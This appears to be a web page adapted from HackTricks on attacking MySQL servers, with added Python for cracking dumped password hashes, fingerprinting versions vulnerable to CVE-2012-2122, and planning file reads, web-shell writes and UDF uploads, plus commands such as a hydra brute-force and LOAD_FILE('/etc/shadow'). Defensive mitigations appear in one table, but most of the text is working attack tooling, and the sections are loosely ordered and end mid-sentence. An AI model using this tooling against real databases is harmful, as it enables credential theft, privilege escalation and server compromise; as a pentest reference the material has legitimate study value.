Verified - Mysql Hacktricks
HackTricks documents known vulnerabilities in older or misconfigured versions, such as the CVE-2012-2122 authentication bypass, where a user who knew a valid account name could log in with any password by repeatedly attempting to connect: the server stored the result of a memcmp() over the password hash in a one-byte variable, so on builds whose memcmp() returns values outside -128..127 roughly one attempt in 256 was accepted.

4. Post-Exploitation

Once access is gained, verified steps involve:

- Extracting password hashes from mysql.user (the authentication_string column on 5.7+, password on older releases).
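As an added example (not HackTricks' own code), here is what to do with those rows once dumped: mysql_native_password stores the unsalted double SHA-1 of the password, so a wordlist pass can be checked offline. The rows and wordlist below are constructed for the example, and the hashcat mode (300, MySQL4.1/MySQL5) is the standard one for this format.

```python
import hashlib
from typing import Dict, Iterable, List, Tuple

# One row of `SELECT user, host, plugin, authentication_string FROM mysql.user`
# (the column is called `password` on MySQL 5.6 and earlier).
UserRow = Tuple[str, str, str, str]


def mysql_native_hash(password: str) -> str:
    """mysql_native_password stores '*' + HEX(SHA1(SHA1(password))).

    There is no salt, so a password always yields the same string and one
    wordlist pass covers every account in the dump.
    """
    stage1 = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(stage1).hexdigest().upper()


def crack_native_hashes(rows: Iterable[UserRow], wordlist: Iterable[str]) -> Dict[Tuple[str, str], str]:
    """Dictionary attack over dumped rows; returns {(user, host): password}.

    Accounts on caching_sha2_password / sha256_password use a salted, iterated
    scheme and are skipped. An empty authentication_string on
    mysql_native_password means the account has no password at all.
    """
    lookup = {mysql_native_hash(word): word for word in wordlist}
    found: Dict[Tuple[str, str], str] = {}
    for user, host, plugin, auth in rows:
        if plugin != "mysql_native_password":
            continue
        if auth == "":
            found[(user, host)] = ""
        elif auth.upper() in lookup:
            found[(user, host)] = lookup[auth.upper()]
    return found


def hashcat_lines(rows: Iterable[UserRow]) -> List[str]:
    """`user:hash` lines for `hashcat -m 300 --username`; mode 300 wants the 40
    hex digits without the leading '*'."""
    return [
        f"{user}:{auth[1:]}"
        for user, host, plugin, auth in rows
        if plugin == "mysql_native_password" and auth.startswith("*") and len(auth) == 41
    ]


# Constructed sample dump; these are not real credentials.
SAMPLE_ROWS: List[UserRow] = [
    ("app", "%", "mysql_native_password", "*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19"),
    ("backup", "localhost", "mysql_native_password", ""),
    ("root", "localhost", "mysql_native_password", mysql_native_hash("not-in-any-wordlist-9f3")),
    ("svc", "10.0.0.%", "caching_sha2_password", "$A$005$constructed-placeholder"),
]
SAMPLE_WORDLIST = ["123456", "password", "admin", "mysql", "root"]

if __name__ == "__main__":
    for (user, host), pw in crack_native_hashes(SAMPLE_ROWS, SAMPLE_WORDLIST).items():
        print(f"{user}@{host}: {pw!r}")
    print("\n".join(hashcat_lines(SAMPLE_ROWS)))
```

Because the scheme is unsalted, precomputing the wordlist once (as `lookup` does) is the right shape; for anything beyond a short list, hand the `hashcat_lines()` output to hashcat rather than iterating in Python.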
LOAD_FILE() works without path restriction when secure_file_priv is the empty string '' (MySQL 5.5+). If secure_file_priv is NULL, file import and export are disabled entirely; if it names a directory such as /tmp/, you can only read from (and write to) /tmp/. In every case the file must also be readable by the OS user mysqld runs as, and the account needs the FILE privilege.
Before attempting login, verify the service and its version to check for known vulnerabilities like CVE-2012-2122 (authentication bypass).

Port scanning: the default port is 3306.

Nmap scripts: use the mysql-* NSE scripts for automated discovery, starting from a version scan of the port: `nmap -sV -p 3306 target`
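The version check can also be done by hand instead of trusting an NSE script: the first packet a MySQL server sends is a HandshakeV10 greeting (or an ERR packet if the client host is refused) carrying the version string, capability flags and auth plugin. Below is an added Python parser for that packet, written for this page rather than taken from HackTricks, which compares the version against the Oracle MySQL ranges affected by CVE-2012-2122 (5.1 before 5.1.63, 5.5 before 5.5.24, 5.6 before 5.6.6). The packets it parses are constructed in the code, not captured from a real host.

```python
import struct
from dataclasses import dataclass
from typing import Optional, Tuple, Union

# Capability bits that change the HandshakeV10 layout.
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_PLUGIN_AUTH = 0x00080000
# Oracle MySQL branches affected by CVE-2012-2122 -> first fixed patch level
# (MariaDB has its own ranges and is deliberately not evaluated here).
CVE_2012_2122_FIRST_FIXED = {(5, 1): 63, (5, 5): 24, (5, 6): 6}

@dataclass
class Greeting:
    server_version: str
    connection_id: int
    capabilities: int
    auth_plugin: Optional[str]
    scramble: bytes

@dataclass
class ServerError:
    code: int
    message: str

def parse_greeting(raw: bytes) -> Union[Greeting, ServerError]:
    """Parse the first packet after TCP connect: 3-byte LE length + sequence id,
    then either an ERR packet (0xFF, e.g. 1130 host not allowed) or HandshakeV10."""
    length = int.from_bytes(raw[0:3], "little")
    payload = raw[4:4 + length]
    if len(payload) != length:
        raise ValueError("truncated packet")
    if payload[0] == 0xFF:
        code = struct.unpack_from("<H", payload, 1)[0]
        rest = payload[3:]
        if rest[:1] == b"#":                 # optional '#' + 5-byte SQLSTATE marker
            rest = rest[6:]
        return ServerError(code, rest.decode("utf-8", "replace"))
    if payload[0] != 10:
        raise ValueError(f"unsupported handshake protocol version {payload[0]}")
    end = payload.index(b"\x00", 1)
    server_version = payload[1:end].decode("ascii", "replace")
    pos = end + 1
    connection_id = struct.unpack_from("<I", payload, pos)[0]
    scramble = payload[pos + 4:pos + 12]     # auth-plugin-data part 1; a filler byte follows
    caps = struct.unpack_from("<H", payload, pos + 13)[0]
    pos += 15
    auth_plugin = None
    if pos < len(payload):                   # extended fields present
        pos += 3                             # character set (1) + status flags (2)
        caps |= struct.unpack_from("<H", payload, pos)[0] << 16
        plugin_data_len = payload[pos + 2]
        pos += 13                            # upper caps (2) + length byte (1) + reserved (10)
        if caps & CLIENT_SECURE_CONNECTION:
            part2_len = max(13, plugin_data_len - 8)
            scramble += payload[pos:pos + part2_len].rstrip(b"\x00")   # NUL-padded
            pos += part2_len
        if caps & CLIENT_PLUGIN_AUTH:
            end = payload.find(b"\x00", pos)
            auth_plugin = payload[pos:len(payload) if end < 0 else end].decode("ascii", "replace")
    return Greeting(server_version, connection_id, caps, auth_plugin, scramble)

def version_tuple(server_version: str) -> Optional[Tuple[int, int, int]]:
    """'5.5.21-log' -> (5, 5, 21); None for MariaDB or unparseable strings."""
    if "MariaDB" in server_version:
        return None
    parts = server_version.split("-", 1)[0].split(".")
    try:
        return int(parts[0]), int(parts[1]), int(parts[2])
    except (IndexError, ValueError):
        return None

def in_cve_2012_2122_range(server_version: str) -> bool:
    """True when the reported Oracle MySQL version predates the fix. A match only says
    "test it": the bypass also needs a build whose memcmp() returns values outside -128..127."""
    v = version_tuple(server_version)
    if v is None:
        return False
    first_fixed = CVE_2012_2122_FIRST_FIXED.get((v[0], v[1]))
    return first_fixed is not None and v[2] < first_fixed

def build_sample_greeting(server_version: str, auth_plugin: str = "mysql_native_password") -> bytes:
    """Constructed HandshakeV10 packet for offline testing, not a capture from a real server."""
    scramble = bytes(range(0x41, 0x41 + 20))          # 20 printable bytes, as real servers send
    caps = 0x0000F7FF | CLIENT_PLUGIN_AUTH            # 0xF7FF already includes CLIENT_SECURE_CONNECTION
    body = bytes([10]) + server_version.encode("ascii") + b"\x00"
    body += struct.pack("<I", 42) + scramble[:8] + b"\x00" + struct.pack("<H", caps & 0xFFFF)
    body += bytes([0x21]) + struct.pack("<H", 0x0002) + struct.pack("<H", caps >> 16)
    body += bytes([21]) + b"\x00" * 10                # 20 scramble bytes + NUL, then reserved
    body += scramble[8:] + b"\x00" + auth_plugin.encode("ascii") + b"\x00"
    return len(body).to_bytes(3, "little") + b"\x00" + body

def build_sample_error(code: int, message: str) -> bytes:
    """Constructed pre-authentication ERR packet (these carry no SQLSTATE marker)."""
    body = b"\xff" + struct.pack("<H", code) + message.encode("utf-8")
    return len(body).to_bytes(3, "little") + b"\x00" + body
```

Against a live target, read the 4-byte header first and then exactly that many payload bytes before calling `parse_greeting()`; the auth plugin name it returns also tells you whether the dumped hashes will be the unsalted mysql_native_password format or caching_sha2_password.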
| Attack Vector | Verified HackTricks Technique | Defensive Mitigation |
|---------------|-------------------------------|----------------------|
| Credential brute-force | `hydra -l root -P wordlist.txt mysql://target` | Enforce account lockout (FAILED_LOGIN_ATTEMPTS / PASSWORD_LOCK_TIME in MySQL 8.0.19+), use strong passwords, restrict network access to 3306 |
| UDF privilege escalation | Uploading udf.so to the plugin directory (`@@plugin_dir`) | Set secure_file_priv to NULL or to a dedicated directory that is not the plugin directory; keep plugin_dir unwritable by the mysqld OS user; run MySQL as a non-root user |
| File read via LOAD_FILE | `SELECT LOAD_FILE('/etc/shadow')` | Do not grant the FILE privilege unless absolutely necessary; confine mysqld with SELinux/AppArmor |
| Writing web shell | `SELECT ... INTO OUTFILE` into the webroot | Set secure_file_priv to a directory the web server does not serve; use prepared statements so SQLi cannot reach these statements |
Write the query output to a file with SELECT ... INTO OUTFILE, then read it over SSH if you have shell access on the host. The same secure_file_priv rules apply as for LOAD_FILE: the write only succeeds when the variable is '' or names a directory containing the target path, and the file is created by the mysqld OS user, which must be able to write there.
Check where plugins are loaded from and which accounts hold the FILE privilege:

```sql
SELECT @@plugin_dir;
SELECT grantee, privilege_type FROM information_schema.user_privileges WHERE privilege_type = 'FILE';
```
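Taken together, the secure_file_priv rules, the plugin_dir lookup and the FILE-privilege query decide which of the file-based techniques in the table (LOAD_FILE read, INTO OUTFILE web shell, UDF dropped into plugin_dir) are actually reachable from a given account. The following added Python, not from HackTricks, encodes that decision; the query results in `SAMPLE_CONTEXT` and the webroot path are assumed values, and the path check is a normalised-prefix approximation of the server's own check (which resolves symlinks first).

```python
import os
from typing import Dict, List, Optional

# Constructed results of the preflight queries; assumed values, not from a real host.
SAMPLE_CONTEXT = {
    "current_user": "'app'@'%'",                  # SELECT CURRENT_USER()
    "secure_file_priv": "/var/lib/mysql-files/",  # SELECT @@secure_file_priv (None models NULL)
    "plugin_dir": "/usr/lib/mysql/plugin/",       # SELECT @@plugin_dir
    "file_grantees": {"'root'@'localhost'"},      # grantee column of the user_privileges query
    "webroot": "/var/www/html",                   # assumed document root
}


def file_op_allowed(secure_file_priv: Optional[str], path: str) -> bool:
    """Would LOAD_FILE()/INTO OUTFILE/INTO DUMPFILE be allowed to touch `path`?

    None -> NULL: file import/export disabled outright
    ''   -> no restriction
    dir  -> only files under that directory (prefix match on the normalised path,
            so '/tmp/../etc/passwd' is rejected; symlinks are not modelled here)
    """
    if secure_file_priv is None:
        return False
    if secure_file_priv == "":
        return True
    base = os.path.normpath(secure_file_priv)
    target = os.path.normpath(path)
    return target.startswith(base + os.sep)


def plan_file_attacks(ctx: Dict) -> Dict[str, List[str]]:
    """Return {'possible': [...], 'blocked': [...]} for the three file-based primitives."""
    sfp = ctx["secure_file_priv"]
    has_file_priv = ctx["current_user"] in ctx["file_grantees"]
    candidates = {
        "read /etc/passwd via LOAD_FILE": "/etc/passwd",
        "drop web shell via INTO OUTFILE": os.path.join(ctx["webroot"], "x.php"),
        "drop UDF via INTO DUMPFILE": os.path.join(ctx["plugin_dir"], "udf.so"),
    }
    result: Dict[str, List[str]] = {"possible": [], "blocked": []}
    for name, path in candidates.items():
        if not has_file_priv:
            result["blocked"].append(f"{name}: {ctx['current_user']} lacks FILE")
        elif not file_op_allowed(sfp, path):
            result["blocked"].append(f"{name}: secure_file_priv={sfp!r} excludes {path}")
        else:
            # Still subject to the OS permissions of the mysqld user, and
            # OUTFILE/DUMPFILE refuse to overwrite an existing file.
            result["possible"].append(name)
    return result


if __name__ == "__main__":
    for bucket, items in plan_file_attacks(SAMPLE_CONTEXT).items():
        print(bucket, items)
```

The default-looking context above (a non-FILE account and secure_file_priv pointing at /var/lib/mysql-files/) blocks all three primitives, which is exactly the state the mitigations column of the table aims for; setting secure_file_priv to '' and granting FILE flips every one of them to possible.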
If you only have SELECT / INSERT privileges, try: